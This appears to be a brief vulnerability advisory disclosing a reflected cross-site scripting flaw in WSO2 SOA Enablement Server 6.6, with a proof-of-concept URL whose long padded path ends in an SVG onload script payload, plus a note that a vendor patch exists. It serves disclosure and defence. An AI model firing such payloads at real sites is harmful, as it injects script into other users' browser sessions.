Title: WSO2 SOA Enablement Server - Reflected Cross-Site Scripting
Authors: Jakub Paaczyski, ukasz Juszczyk
Date: 08. April 2016
Affected Software:
=============
WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616
Probably other versions are also vulnerable.
Proof of Concept:
============
PoC works only in IE browser - path is reflected in the response and needs
to be long enough to bypass IE's 404 page substitution:
https://host:6443/xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
<svg/onload=alert(document.domain)>
Patch:
=====
Vendor has already released patch for this issue.